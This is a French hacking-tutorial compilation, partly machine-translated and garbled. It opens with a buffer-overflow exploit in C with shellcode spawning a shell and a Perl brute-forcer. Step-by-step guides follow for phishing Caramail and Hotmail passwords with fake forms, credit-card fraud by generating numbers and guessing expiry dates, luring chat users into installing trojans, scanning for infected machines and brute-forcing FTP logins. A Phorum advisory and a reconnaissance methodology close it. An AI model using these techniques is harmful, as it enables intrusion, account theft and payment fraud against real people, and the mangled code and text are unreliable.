La conclusion hors de l'adresse absolue du shellcode n'est pas aussi facile, c'est pourquoi simplifier pour n'importe quoi on préfèrent mettre le shellcode au milieu de l'amortisseur et compléter partout de NOPs. Nous frapperons probablement un du NOPs dans la chaîne, auquel nous joindrons le shellcode. Voici l'exploit pour le programme vulnérable.

L'adresse de retour relative (retour) a été obtenue comme suit :

Commencer le programme : Perl vulnérable de ` - printf "a" x 260'` de

e '

Le programme a reçu le signal SIGSEGV, défaut de segmentation.

0x61616161 in ?? ()
(gdb) info reg esp
esp 0xbfffdb40 0xbfffdb40
(gdb)

L'adresse de retour absolue sera à côté de notre retour, il sera

assez d'utilisation d'un certain bruteforce pour découvrir le bon

excentrage.

//EXPLOIT.C
#include

#define NOP 0x90 // NOP OPCODE
#define LEN 128 // Buffer Size
#define RET 0xbfffdb40 // return Address

static char shellcode[]=
"xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8d"
"x4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6ex2fx73x68x58";

main(int argc, char *argv[])
{
char buffer[LEN];
long retaddr = RET atoi(argv[1]);
int i;
printf("Shellcode size : %d ", strlen(shellcode));
fprintf(stderr,"Using address 0x%lx ",retaddr);

// Build the overflow string.
for (i = 0; i < LEN; i = 4) *(long *) &buffer[i] = retaddr;

// copy NOP
for (i=0; i<(LEN-strlen(shellcode)-10);i ) *(buffer i) = NOP;

// Copy the shellcode into the buffer.
memcpy(buffer i,shellcode,strlen(shellcode));

// Execute the program
execlp(“vulnerable", "vulnerable", buffer, NULL);
}


//BRUTE.PL
#!/usr/bin/perl
$MIN=0;
$MAX=5000;

while($MIN<$MAX)
{
printf(" offset : $MIN ");
system("./exploit $MIN");
$MIN ;
}


Conclusions



$./brute.pl
…….
Shellcode size : 38
Using address 0xbfffdbc5
offset : 134
Shellcode size : 38
Using address 0xbfffdbc6
offset : 135
Shellcode size : 38
Using address 0xbfffdbc7
sh-2.05b$

Nous pourrions exécuter le shellcode exploitant le débordement de PILE. L'existence d'un programme vulnérable représente une menace sérieuse pour la sécurité de nos systèmes. Un attaquant pourrait exécuter le code arbitraire avec des permissions élevées si possible. En fait n'existe aucune manière d'être sûre en raison de la nature des attaques, infact qu'elles sont basées sur des erreurs de programmation, pour cette raison il est très important de maintenir le logiciel constamment amélioré.

Buffer

Les attaques de type buffer overflow

Un buffer overflow est une attaque visant à expoiter une faille dans une application (navigateur web etc...) pour exécuter un code arbitraire.
En pratique, une attaque de type buffer overflow fait crasher le programme en écrivant dans un buffer plus de donné qu'il ne peut en contenir ( un buffer est une zone de mémoire temporaire utilisée par une application) dans le but d'éffacer une partie du code de l'application et d'y injecter le code pour exploiter le plantage de l'application.

Cette technique requière cependant un excellent niveau en programmation pour être exploité. Son principal intérêt est qu'il ne nécessite pas dans la plupart des cas un accés au système . Elle est donc redoutablement efficace !

Comment éviter ce type de faille?

-On peut par exemple utiliser un language qui n'autorise pas ce type de faille (Java...)
-Utiliser des logiciels spécialisé dans la vérification du code source
-Avoir des produits mise à jours
-Utiliser des logiciels bien codé

Caramail

Formulaire piégé caramail

Caramail
Hacker une boîte caramail
* Formulaire piégé !
Le formulaire, c'est une technique très connue qui est surtout applicable quand l'inocente victime n'est pas trop inteligente ... (disons qu'on va jouer avec le côté con du pigeon !) On va tout simplement lui envoyer un formulaire semblable à un formulaire d'erreur de son fournisseur lui demandant de mettre son mot de passe car un problème est survenue ! Il faut remplacer "votre e-mail@fournisseur.com" par votre mail. Il faut envoyer le tout en html. Vous pouvez envoyer ce formulaire er vous créant une boite sur caramail. Pour que ce soit plus crédible, prenez une adresse de type admin@caramail.com.

Vous pouvez aussi utilisez Ghostmail pour envoyez les formulaires. En effet, c'est un logiciel de mail anonyme qui permet aussi d'envoyer des formulaires puisqu'il a une option "envoyer en html". Il est plutot facile a utiliser. D'abord vous le télécharger dans la rubrique download et vous l'ouvrez. Vous faites copier-coller le code dans le champ message et vous remplissez les données demandez (expéditeur, destinataire...). Il y a plusieurs onglets pour les options. Naviguez dans les onglets et cochez la case "envoyer en html" (ou kekchose de ce genre). Il va falloir entrez un serveur par exemple smtp.free.fr, smtp.laposte.net... Avant d'envoyer le formulaire, vérifiez bien que vous avez mis votre e-mail à la place de "votreemail@fournisseur.com. Cliquez sur envoyez et c'est terminé!!!

voilà le code du formulaire:

Carding

Le carding est une fraude de cartes bleues. C'est une méthode qui consiste à trouver un numero de CB ( carte bancaire)valide, ainsi que sa date d'expiration. Cela se fait grace à un algorithme. Des logiciels permettent de faire ce calcul rapidement.


Comment trouver un numéro de CB valide et sa date d'expiration?
tout d'abord, il vous faut un générateur de numero de CB.
Avec ce GNCB (Générateur CB), vous générez une liste de numero valides. Ensuite
vous prenez votre carte de crédit (ou celle d'un copain).
Le numero est représenté sous cette forme:

XXXX - XXXX - XXXX - XXXX XX/XX
série1 | série2 | série3 | série4 Date d'exp
Vous comparez votre liste de numero avec celui de votre carte, puis vous
conservez seulement les numeros dont la série4 est inférieure à celle de votre
carte. La date d'expiration sera donc inférieure ou égale à la votre.

Prenons un exemple (En rouge, c'est la série4) :

XXXX - XXXX - XXXX - 3642 <=== Votre numero de carte de crédit.
XXXX - XXXX - XXXX - 4518 <=== Série 4 supérieure à la votre: à rejeter.
XXXX - XXXX - XXXX - 6468 <=== Série 4 supérieure à la votre: à rejeter.
XXXX - XXXX - XXXX - 3258 <=== Série 4 inférieure à la votre: à conserver.
XXXX - XXXX - XXXX - 8473 <=== Série 4 supérieure à la votre: à rejeter.
XXXX - XXXX - XXXX - 3289 <=== Série 4 inférieure à la votre: à conserver.
Maintenant que l'on a deux numero intéressant, on va choisir le numero dont la
série4 est plus proche de la série4 de votre carte. Dans notre exemple c'est le
: XXXX - XXXX - XXXX - 3289.
La date de validité de votre carte est 06/02, pour trouver celle de notre carte
générée, on va allez dans un site XXX à accés gratuit où ils contrôlent si vous
êtes majeur par vérification de votre numeto de carte. On va prendre les numero
de la carte générée et pour la date, on va commencer par la votre (06/02) puis
on prendra 05/02, 04/02, 03/02, 02/02, 01/02, 12/01, 11/01, etc... jusqu'à que
la carte soit acceptée.
Et dés que vous avez votre numero et la date, vous pourez alors faire tous ce
que vous voulez

Les numeros en fonction de la banque :

Sur une carte bancaire; les quatres premiers numeros sont en fonction de la
banque.
Si vous voyez sur une CB que les quatre permiers chiffres sont : 4970, vous
savez que la personne qui a cette carte est à la poste.

Voici donc une liste des quatres premiers numeros en fonction de la banque:
4970 : La poste
4971 : Crédit Commercial
4972 : Crédit Lyonnais
4973 : Société Générale
4974 : BNP
4975 : Banque Populaire
4976 : Banque Sofinco
4978 : Caisse d'Epargne
5016 : Finedis
5032 : Accord Finances
5131 : Crédit Agricole

etc ...
voila

Forum

Vulnerabilites multiples dans Forum

Forum est une application PHP open source. Il s'agit d'un forum de discussion ecrit en php. Plusieurs failles permettent l'injection de commandes sql et il présente plusieurs vulnérabilité de type CSS (cross site scripting).

Forum est une application PHP open source. Il s'agit d'un forum de discussion ecrit en php. Plusieurs failles permettent l'injection de commandes sql et il présente plusieurs vulnérabilité de type CSS (cross site scripting).

Vulnerables:
Phorum version 3.4.5 et précédents
Immunisés:
Phorum version 3.4.6
Phorum version 5.0.2 alpha

Une vulnérabilité XSS existe dans le script common.php qui permet l'éxécution de code. Elle est présente dans la fonction phorum_check_xss(). Cette fonction est justement censé protéger de ce type d'attaque.
if(!is_array($value) && $key!="body" && $key!="subject" && $key!="hide" && stristr($value, "< script")){ echo "script detected in $key";
En envoyant une variable HTTP/post à n'importe quel script de Forum, il est possible de transformer la variable key en une attaque XSS, fournissant la valeur de la variable qui contient " Cette vulnérabilité peut être exploitée pour obtenir les login, Spammer, ou faire du social engineering .

Une autre vulnérabilité de XSS existe dans le script 'profile.php '. Si un utilisateur est logé, un attaquant pourrait employer cette vulnérabilité pour inclure un code arbitraire sur le browser de l'utilisateur. Des attaques de XSS ne sont pas juste limitées aux tags script!. Un attaquant pourrait employer beaucoup de formes de XSS (telles que l' !iframe! ) pour lancer des attaques sur des utilisateurs.
Il est ainsi possible, si l'utilisateur visé est logé, de faire un reset du mot de passe, de modifier des informations sur son compte....

Une vulnérabilité d'injection SQL existe dans le script 'register.php' dans le champ 'hide_email'.
Cette vulnérabilité peut mener à l'exécution des commandes SQL à l'intérieur du script.
En raison de l'endroit dans lequel la variable d'injection de SQL est placée, il est de plus en plus difficile d'exploiter cette vulnérabilité .

Salutation...

Hacker une personne

Si vous voulez hacker une personne, c'est que vous avez une bonne raison ! Donc, j'ai confiance en vous et je vous permet de lire ce petit "cours" (mibneo.fr ne pourra être tenu d'éventuels dégâts sur vos machines ou celles de vos victimes).

*Pour commencer il vous faut une victime (LOGIQUE), ensuite, son IP (un n° qui permet de l'identifier sur le net), pour les connectés par cable (TELEDISnet) l'IP est fixe, ce qui veux dire qu'à chaque connection elle ne change pas, tandis que les connectés par ligne téléphonique HAUT DEBIT (==> si vous utilisez un modem 56 k ou moins, ca risque d'être long, trèèèèèèèès long !) l'IP change à chaque connection, un troyen, un brouilleur d'IP ,et la dernière chose nécessaire, c'est un port infecté (chez votre victime)
Vous allez sur IRC, choissisez vous un pseudo trés simpliste, évitez les truc du style "RoiDuHack" ou autre conneries dans le genre, pour 2 raisons:
La premiere c'est que vous etes loin d'être le roi du hack...
et la seconde: niveau discrétion c'est pas terrible...
Ensuite choisissez une personne au hasard.
Faites connaissances avec cette personne, entretenez la conversation tout tranquillement et vous essayer de gagner sa confiance (jusqu'a la c'est pas dur).
Puis apres vous vous demerdez pour insérez dans la conversation que vous possédez un tout nouveau logiciel super cool etc...(ex: generateur, expansion d'un logiciel, anti-nuke etc...) Et evidemment comme vous êtes super cool, vous vous proposer gentillement pour lui envoyer si elle veut :)
Parce que c'est vrai que vous êtes pleins de bonnes intention n'est ce pas ?? :)
Si elle accepte, c'est bon, le   dur est fait...
Vous lui envoyer, elle l'installe, et evidement qu'est ce qui se passe ? : le logiciel marche pas (Oh non ! Bein pourquoi !?)
Soit il va apparaitre un petit message débile style "ce fichier est lié a un objet manquant" ou autre conneries dans le genre, ou bien il va rien se passer du tout... Dans tout les cas, votre victime va se poser des questions... alors vous lui direz, "ah bein c'est con ca, il te manque un fichier système dans ton Windows, c'est con pourtant chez moi ca marche trés bien et tout etc..." et puis vous anticipez pour lentement changer de sujet...


*Une autre technique, le fake-mail ("Faux-mail").
Vous prenez un logiciel style "Ghostmail" et vous envoyez plusieurs fake-mail à n'importe qui avec le fichier server en fichier joint, et vous racontez que c'est une expansion pour le système de messagerie etc...
Evidement, choissisez bien le nom de votre adresse pour que ce soit crédible, prenez par exemple
Admin@hotmail.com , ou webmaster@caramail.com etc..


*Toujours par mail, vous utilisez le logiciel "Ex-Maker" et vous dissimulez le fichier "server" d'un troyen avec un fichier exe quelconque.
Lorsque le type regardera lancera le logiciel en question, le troyen s'executera en parallèle du "vrai" logiciel, comme si de rien n'était :)


*Une technique plus simple, mais plus longue.
Ce qui est cool c'est que vous vous faites pas chier à envoyer le fichier "server" !!
Bein comment qu'on fait alors ??
Bein facile, vous profitez des fichiers "server" déja installés sur les ordis...
Hé ouais, beaucoup de personnes sont infectés sans le savoir et on peut donc se connecter a leur ordi trés facilement sans avoir a envoyer le server...
Va vous falloir un "scanner d'IP" et une grosse collection de troyens à disposition.
Prenez le logiciel "Superscan 3.0" c'est le meilleur.
Vous n'aurez pas besoin d'autre logiciel (IRC, ICQ, etc...)
Le plus dur pour cette technique va être de trouver une IP infectée par le troyen que vous désirez utiliser, et ca, c'est pas evident, faut avoir pas mal de chance...
Alors, vous lancez votre scanner d'IP et vous scannez une plage d'une centaine d'IP Le scanner va fouiller les ordinateurs correspondant aux IP que vous lui avez demandé de scanner. Et il va chercher si il y a déjà des troyens d'installés...
Voila, c'est tout, maintenant attendre... Le scan terminé, 2 résultats possible:
- 1er résultat: Vous avez pas de chance, votre scanner à rien trouver...
Solution: Y'a plus recommencer avec d'autre IP
- 2eme résultat: Vous avez de la chance, votre scanner d'IP a trouvé un ordinateur infecté par un troyen...
Dans ce cas la, il vous dira quel est ce troyen et il vous dira aussi quel port utiliser. Alors là c'est Youpikayé, vous commencez a gesticuler dans votre siege... et il vous reste plus qu'a lancer le fichier "client" du troyen en question et de vous connecter a l'IP infectée...
Et voila, maintenant vous avez plus qu'a fouiner un peu :)
Si vous avez du mal avec Superscan 3.0, reportez vous dans la section "Tutos"
Voila, c'est pas bien compliqué, il existe encore pleins d'autre techniques, a vous de voir et de faire des tests...
Après, vous faites ce que vous voulez, mais restez le   discret possible...
Et bien sur, n'agissez pas en tant que crasher, ne bousillez pas l'ordi de votre victime pour rien. Détruisez tout, seulement si vous trouvez des trucs pédophiles, racistes etc... là, vous avez notre accord, mais sinon... soyez cool ;)

Hacker un site

Bon là, ca ce corse, vous voulez hacker un site. OK mais pas n'importe lequel, un site raciste, pédophile, enfin des trucs dans le genre, je vous préviens, c'est plus difficile qu'une simple personne.

Bon on va faire simple et rapide:

Il vous faudra plusieurs choses essentielles:
- Etre parfaitement anonyme, c'est a dire avoir parfaitement spoofer votre IP
- Avoir une connexion haut-débit (Cable, Adsl, Tx)
- Avoir une patience à toute épreuve :)
Et il vous faudra:
- un cracker de pass (Ex: Brutus)
- un dico (facultatif)
Maintenant voila comment faire:
Prenons comme exemple un site hébergé par Chez.com :
http://www.chez.com/victime
Ouvrez votre cracker de pass.
Mettez le nom du server ("
www.chez.com" dans notre exemple) dans "Host"
Mettez le nom d'utilisateur ("victime" dans notre exemple) dans "user".
Vous laissez le port 21.
Vous selectionnez le dico de votre choix dans "password".
Vous cliquez sur "go" ou "start" et il trouvera tous seul le bon mot de pass.
A noter que vous êtes pas obligé d'utiliser un dico, car il existe une méthode appelée le Brute Force qui consiste à essayer toutes les combinaisons possibles pour trouver le mot de passe. Evidemment c'est encore   long. Mais au moins y'a pas besoin de dico.
Voila c'est terminé !! Sachez toutefois que ca prend beaucoup de temps...
Notez aussi que certains dicos ne sont pas compatibles avec certains crackers et vice-versa.

Maintenant dernière recommendation:
Sur ce site on vous apprend à agir en tant que "Hacker" et non en tant que Crasher !! Un "hacker" n'est pas censé foutre en l'air tous les sites qu'il visite !! Ok ??!! Ca, ca s'appelle le crashing...
Si vous voulez être respectable, attaquez-vous seulement aux sites style site racistes, pédophiles etc...
2ème méthode : TELNET
Le site que nous prendrons comme exemple sera hacker.com. La première chose à faire, avant de
ce mettre à cette tâche ardue, est de vérifier que l'on a le "matériel nécessaire", ce qui revient à
dire:


Telnet
DOS et les tracert, ping, etc...
Un crackpass (puissant)
WS_PINGPR (de préférence)
Une connaissance sous Linux ou Unix (ou même aucune)
L'url du site à pirater
Pour commencer il faut obtenir le maximum d'infos sur le site et les répertorier sur un carnet
ou sur une feuille: elles sont nombreuses.
Avoir l'url du site, son adresse IP et TCP: pour avoir ces infos aller sous dos, taper (les ">" ne
devant pas être écrit):

> tracert www.site.com

ENTREE

- Vous n'avez pas l'adresse TCP du site, vu qu'il n'en a pas.

L'adresse IP est: 209.195.130.87.

- Les infos sur les utilisateurs (grâce à WS_PINGPR):

Administrative Contact, Technical Contact, Zone Contact:Beckett, Jodi (JB11383)
jodi@NAUTICOM.NET
412-449-4600 (FAX) 412-449-4659

Billing Contact:Beckett, Jodi (JB11383) jodi@NAUTICOM.NET
412-449-4600 (FAX) 412-449-4659

Ensuite essayez (ce n'est pas le cas pour ce site), essayez sur le navigateur:
ftp://www.nomdusite.com ou ftp://ftp.nomdusite.com. ensuite vous cherchez la rubrique password,
si l'accès aux ftp par ce chemin n'est pas protégé (rare). cette rubrique password vous donnera les
logins (pas les pass) pour les utilisateurs, sinon par défaut sortez votre crackpass... mais dans
quelles conditions doit dont mettre un nom d'utilisateur et un password, et où? On verra ça un peu
après.

Puis accéder aux autres adresses IP qui sont les plus proches du site. En faisant un tracert,
l'adresse juste au dessus du site, vous donne l'adresse du routeur du site (en général, sinon
scannez le réseau). Vous prenez son adresse IP ou l'adresse locale (Local Host), vous prenez
Telnet et vous rentrez l'adresse IP, port SNMP. Vous voilà connecté au router par telnet. On vous
demandera le nom d'utilisateur et son password.

Voilà! ca c'est pour le démarrage! Ensuite... Vous allez sous DOS et vous faîtes (les ">" ne
devant pas être écrit):

> ftp
> open
>
www.site.com

On vous demandera un nom d'user. Vous pouvez rentrer en anonymous si le serveur le
permet, et télécharger les pages, mais ce ne sera pas du hack, je vous dis comment faire:
vous rentrez comme nom d'user: anonymous, ensuite vous tapez n'importe quel password et vous
tapez: ls
Donc vous regardez les infos obtenus avec WS_PINGPR et vous avez plusieurs noms qui
vous sont donnés: Beckett et Jodi.
Vous essayez les 2 noms d'utilisateurs et vous remarquez que "Jodi" répond! Très bien! vous venez
de faire la moitié: vous avez trouvez un nom d'user, il vous faut maintenant le password... Inutile de
vous casser la tête! Si la personne est prudente vous n'avez aucune chance de le trouver. Sortez
votre meilleur Crackpass et essayez. Par défaut rabattez-vous sur le(s) routeurs par telnet. Bonne
chance!

Hotmail

Formulaire piégé hotmail

Hotmail
Hacker une boîte hotmail
* Formulaire piégé !
Le formulaire, c'est une technique très connue qui est surtout applicable quand l'inocente victime n'est pas trop inteligente ... (disons qu'on va jouer avec le côté con du pigeon !) On va tout simplement lui envoyer un formulaire semblable à un formulaire d'erreur de son fournisseur lui demandant de mettre son mot de passe car un problème est survenue ! Il faut remplacer "votre e-mail@fournisseur.com" par votre mail. Il faut envoyer le tout en html. Vous pouvez envoyer ce formulaire er vous créant une boite sur caramail. Pour que ce soit plus crédible, prenez une adresse de type admin@hotmail.com.

Vous pouvez aussi utilisez Ghostmail pour envoyez les formulaires. En effet, c'est un logiciel de mail anonyme qui permet aussi d'envoyer des formulaires puisqu'il a une option "envoyer en html". Il est plutot facile a utiliser. D'abord vous le télécharger dans la rubrique download et vous l'ouvrez. Vous faites copier-coller le code dans le champ message et vous remplissez les données demandez (expéditeur, destinataire...). Il y a plusieurs onglets pour les options. Naviguez dans les onglets et cochez la case "envoyer en html" (ou kekchose de ce genre). Il va falloir entrez un serveur par exemple smtp.free.fr, smtp.laposte.net... Avant d'envoyer le formulaire, vérifiez bien que vous avez mis votre e-mail à la place de "votreemail@fournisseur.com. Cliquez sur envoyez et c'est terminé!!!

rectification: Ghostmail est maintenant détecté par hotmail, et la fonction envoyé en html est désactivé sur hotmail. Soit vous trouvez un mail anonyme compatible html, soit vous vous créer en plus une boite sur yahoo, vous envoyez en html le code sur votre boit homtmail, une fois reçu vous cliques sur répondre et mettez l'adresse du pigeon. Eh ouais, faut ruser ;-).

voilà le code du formulaire:

Intrusion réseau

Techniques d'intrusion dans les réseaux

De plus en plus d'attaques sont répertoriées par les agences officielles, ont voit surtout de plus e plus de personnes qui vont en prison, mais avez vous que la plupart des actes de piratages n'auront pas suite, car les entreprises à part un firewall et un antivirus n'ont pas de moyen pour lutter contre les "crasheurs"; nous allons aborder ici les bases qui permettent de comprendre comment font ces pirates...


Sommaire

1. Introduction..........................................................7
2. Cadre de la présentation................................................................7
3. Identification de la cible....................................................................8
3.1 DNS, Domain Name System .....................................................................8
3.2 Bases d.adresses IP ...................................................................9
3.3 Bounces de découverte .......................................................................9
3.4 Moteurs de recherche.......................................................................10
3.5 Outils réseaux de diagnostic...............................................................10
3.6 Social-engineering...........................................................................................10
4. Scanning ...................................................................................................11
4.1 Rappel sur les protocoles TCP/IP ......................................................11
4.1.1 IP..................................................................................................11
4.1.2 TCP...............................................................................................12
4.1.3 UDP..........................................................................................12
4.2 Recherche des machines actives : scan ICMP et TCP ..........................13
4.3 Port scanning TCP et UDP ......................................................................13
4.3.2 Techniques avancées de scanning.......................................................15
4.3.3 Autres techniques de découverte de la topologie........................17
5. Exploitation.....................................................................................19
5.1 Classe des attaques par usurpation d.identité............................................19
5.1.1 Découverte d.informations d.authentification par essais......................19
5.1.2 Abus de relations de confiance............................................19
5.1.3 Interception d.informations d.authentification .........................20
5.1.4 Détournement de flux existants ..............................................21
5.2 Exploitation de fautes d.implémentation.....................................21
5.2.1 Buffer overflows.....................................................................22
5.2.2 Attaques format string.............................................................23
5.2.3 Métacaractères shell et caractères spéciaux ...........................23
5.2.4 Virus, chevaux de Troie................................................23
5.3 Elévation des privilèges ...........................................................24
6. Progression ..............................................................................25
6.1 Inspection du système compromis............................................25
6.1.1 Nettoyage du système...........................................................25
6.1.2 Pose de backdoors...............................................................26
6.2 Prise d.information, progression ...............................................27
7. Conclusion..................................................................................28




1. Introduction
La connaissance des stratégies, méthodes et techniques employées par les pirates informatiques est de même
primordiale pour la compréhension de leurs comportements, et l.élaboration de lignes de
défense adaptées : quelque soit la sophistication ou le raffinement des techniques utilisées,
l.expérience nous fait dégager des lignes directrices quant au déroulement de telles attaques.
Nous allons ici décrire d.un point de vue technique les différentes phases de l.attaque1 d.un
système d.information par un agresseur situé sur Internet : de l.identification de la cible à
l.exploitation puis à la progression sur le système compromis.
2. Cadre de la présentation
Les menaces potentielles sur un système d.information sont multiformes et difficilement
identifiables en raison de la variété des agresseurs, des cibles possibles et des moyens
d.attaques.

Nous allons dans la suite considérer le cas d.un agresseur externe à l.organisation cible, quelles
que soient ses motivations et sa nature.

En première approche, les possibilités de compromission du système visé se résument à la
capacité de cet agresseur à se créer une porte d.entrée :
- Compromission directe des accès extérieurs, tels que : accès Internet, système
téléphonique (PABX), X.25 ou lignes dédiées vers des prestataires ou partenaires.
- Injection de pièges (chevaux de Troie, virus)
- Social engineering (pour obtenir indirectement ou faciliter un des points précédents),
détournement de personnel

Le présent document s.intéressera au cas des attaques directes contre l.accès Internet du
système d.information cible.
Notons finalement que même si le siège des accès Internet n.est pas la meilleur méthode pour
obtenir une intrusion réussie (X.25 et le scanning téléphonique sont beaucoup plus probants),
c.est du moins la plus facile à mettre en .uvre (multiplicité des moyens d.accès, quasi gratuité,
.) et celle pour laquelle le plus d.information est disponible.

1 Hors attaques de type déni de service.

3. Identification de la cible
Dans une première phase, l.agresseur identifie la cible dans son environnement (Internet dans
notre cas). En utilisant des informations publiques pour la plupart, il découvre les localisations et
interactions de l.organisation avec le reste d.Internet, afin d.arriver à une liste exhaustive des
accès extérieurs et donc des portes d.entrées potentielles à forcer. Il dispose à la suite de cette
phase d.un début de cartographie des environs de la cible sur le réseau Internet, des partenaires
et prestataires ayant potentiellement des liens physiques et logiques avec elle, de données
brutes telles que des noms d.employés ou numéros de téléphones, qui seront potentiellement
utiles pour des tentatives de social engineering ou de wardialing.
En fonction des motivations et des résultats attendus, cette phase peut être d.extrêmement
rapide à assez longue, étant donné que son exhaustivité déterminera en grande partie le succès
de l.intrusion, en permettant de centrer directement l.attaque sur une porte dérobée ou en
donnant des alternatives à l.attaque d.une ligne de défenses efficaces.

Dans certains cas, cette phase n.est même pas présente : il est fréquent que l.organisation
agressée ne soit pas la motivation d.une attaque. De nombreux pirates balaient des plages
d.adresses ou des pays entiers pour trouver des machines vulnérables qu.ils pourront
compromettre, le plus souvent pour servir comme point de départ pour d.autres attaques. La
cible elle-même est ainsi toute machine située dans le bloc balayé, quel que soit son
propriétaire. La phase de recherche et d.identification de la cible est donc ici quasiment
inexistante, elle se résume au balayage d.adresses IP ou d.entrées DNS.

Etant donné que la majorité des informations recueillies lors de cette phase d.identification sont
publiques (le pirate essaie d.éviter de « toucher » directement la cible), elle est assez difficile,
voire impossible à détecter. Seules certaines techniques, en particulier les balayages DNS
peuvent être visibles par les administrateurs sécurité ou les mécanismes de détection
d.intrusion.


3.1 DNS, Domain Name System
Le DNS est la base d.informations la plus évidente pour la localisation d.une cible. Afin de
connaître les noms de domaines possédés par la victime, notre agresseur peut procéder par
essais ou aller consulter les registres publiques des noms de domaines (whois).
L.interrogation des registres whois2 se fait directement par nom de domaine ou par mots clef. Le
résultat obtenu est la liste des domaines correspondants aux mots clefs entrés, ainsi que toutes
les informations associées : entre autres, noms des contacts techniques, administratifs,
adresses postales, téléphones, et adresses IP des serveurs DNS.
L.agresseur peut ensuite utiliser ces renseignements pour étendre sa recherche en interrogeant
par exemple le registre avec comme mot clef le nom du contact technique. Il obtient ainsi une
liste déjà importante de cibles potentiellement utiles pour son intrusion.
Fort de ces informations, il est ensuite utile d.évaluer l.étendue des domaines, en utilisant une
fois de plus les services du DNS. Nous pouvons ainsi déterminer si les serveurs DNS sont
hébergés chez des prestataires ou directement chez la victime. Si tel est le cas, ce prestataire
peut lui aussi devenir une cible, en cas d.attaque directe infructueuse.
Nous pouvons aussi demander une liste de tous les couples nom/adresse IP enregistrés dans le
DNS pour un domaine donné. Cette fonctionnalité, dite AXFR, est nécessaire pour le transfert




de zones entre serveurs de noms. Elle est très intéressante pour un agresseur et est donc
communément restreinte aux seuls serveurs autorisés.
Le DNS nous permet finalement d.obtenir les adresses des machines courantes, telles que
www.x.com, ftp.x.com, mail.x.com ainsi que les adresses des serveurs de messagerie externes
(entrées MX, mail-exchanger, des DNS). Un dernier type de requête, dite HINFO (host info),
donne des renseignements sur la machine cible, tels que : modèle, système d.exploitation. Les
entrées HINFO des tables DNS, pour des raisons évidentes de confidentialité et de sécurité ne
sont maintenant quasiment jamais renseignées.

2 http://whois.networksolutions.com/cgi-bin/whois/whois pour les domaines TLD .com/.net/.org, les sites
des organismes chargés de gérer les noms de domaines nationaux autrement.


3.2 Bases d.adresses IP
Nous avons vu comment le DNS procure à un pirate des informations essentielles pour la
préparation de son attaque. Le DNS n.est cependant pas exhaustif ; étant donné que chaque
machine, donc chaque adresse IP, est potentiellement une cible, notre agresseur va étendre sa
connaissance de quelques adresses IP à des blocs entiers d.adresses au moyen des bases
d.adresses que sont le RIPE, l.ARIN et l.APNIC.
Ces bases sont nécessaires au bon fonctionnement d.Internet car elles détaillent aussi bien les
organismes propriétaires, personnels à contacter que les étendues et les routages associés aux
netblocks, ces fameux pans d.adresses IP réservées sur Internet.
L.agresseur identifie donc les différentes adresses qu.il a recueillies avec DNS grâce aux
moteurs d.interrogation des bases d.IP3. Cette identification lui permet de savoir à quel netblock
appartient une adresse IP donnée, et donc l.organisation propriétaire de l.adresse. Il élargit donc
son champ d.attaque aux adresses non inscrites dans le DNS. Inversement, il va corréler le
résultat de ses recherches en interrogeant les bases d.adresses avec comme critère de
recherche le nom de la cible, des contacts techniques, .


3.3 Bounces de découverte
La plupart des serveurs de messagerie (SMTP et News) rajoutent aux messages qu.ils
véhiculent des informations de diagnostic, masquées ensuite par le logiciel client de l.utilisateur.
Ainsi, les en-têtes des e-mails comportent non seulement expéditeur, destinataire, mais aussi
tout le cheminement du message au travers des serveurs de messagerie. Typiquement, chaque
serveur rajoute au message une en-tête From : décrivant le serveur (adresse IP locale,
identification du logiciel et numéro de version) et l.heure de passage. Il en est de même pour les
messages NNTP tels que ceux postés sur Usenet.
Une technique classique de découverte consiste à envoyer un e-mail de reconnaissance à une
adresse invalide du domaine cible. L.e-mail est très souvent retourné à son expéditeur avec un
message d.erreur, d.où le nom de bounce. L.examen des en-têtes présents dans le mail
retourné va donc donner au pirate des informations importantes comme les versions des
serveurs de messagerie externes, les adresses, noms et versions des serveurs de messagerie
internes. Ces renseignements seront utiles par la suite lors des attaques et de la progression
dans le système d.information compromis.

Received: from relais.x.com ([1.2.3.4]) by smtp.Secway.com (smap) with SMTP id QAA21414 for
; Fri, 11 Aug 2000 16:20:06 0400
Received: from 192.1.1.20 by relais.x.com (InterScan E-Mail VirusWall NT); Fri, 18 Aug 2000
18:11:44 0200 (Paris, Madrid (heure d'été))
Received: by mail.x.com(Lotus SMTP MTA SMTP v4.6 (462.2 9-3-1997)) id C1256938.0043AF89 ; Fri, 11
Aug 2000 14:19:18 0200

3 Les bases sont séparées géographiquement en: RIPE (Europe): http://www.ripe.net, ARIN (Amérique du
Nord/Sud/Centrale, Caraibes, Afrique sous saharienne): http://www.arin.net, APNIC (Asie, Pacifique):
http://www.apnic.net


Le social-engineering constitue aussi un moyen direct d.utiliser ces informations comme moyen
de compromission, en appuyant la tentative de social-engineering par des informations internes
découvertes par ce biais.
Notons finalement que le problème de la sécurité des applicatifs clients est de plus en plus
préoccupant, notamment en raison de la complexité de nombreuses applications telles que les
navigateurs Web ou les logiciels clients de messageries. Les attaques dirigées sur le client (en
compromettant un serveur et modifiant son comportement, pour exploiter un bug du client par
exemple) vont en se répandant et la connaissance par le pirate des serveurs, logiciels utilisés,
. peut faciliter grandement une intrusion.
Si le bounce ne fonctionne pas (cas des bounces détruits sans retour à l.expéditeur d.origine), le
pirate dissimule ceci sous forme d.un e-mail de demande d.information et attend la réponse
légitime.


3.4 Moteurs de recherche
L.agresseur ne se limite pas aux seules informations techniques afin de préparer son attaque.
L.interrogation des moteurs de recherche Web classiques, tels qu.Altavista, Google, Yahoo, peut
révéler de nombreuses informations :
- noms d.employés, ayant par exemple postés dans des mailing-lists ou adresses IP
d.employés accédant à distance au réseau interne (VPN)
- liens hypertextes à partir d.autres sites vers le site cible
- communiqués de presse, détaillant des partenariats, rapprochements, .
D.autre part, des moteurs plus spécifiques comme DejaNews révèlent en plus potentiellement
des éléments techniques intéressants : l.analyse des en-têtes de messages envoyés sur Usenet
permet de déterminer le serveur de News utilisé par l.organisation cible, les versions des
logiciels clients utilisés, . Nous rejoignons ici la technique de « bounce » de découverte décrite
précédemment.


3.5 Outils réseaux de diagnostic
De nombreux outils de diagnostic réseaux permettent de recueillir des informations utiles pour la
phase d.identification de la cible. Ainsi, le programme traceroute fournit-il la liste de tous les
systèmes (routeurs) entre la source du traceroute et la machine destination. Ces données, à
recouper avec celles issues des registres, permettent de recadrer l.attaque vers un prestataire
vulnérable, afin par exemple de prendre le contrôle du tuyau utilisé par la cible. Traceroute et
ses dérivés laissent cependant des traces dans les systèmes de détection d.intrusion (ils
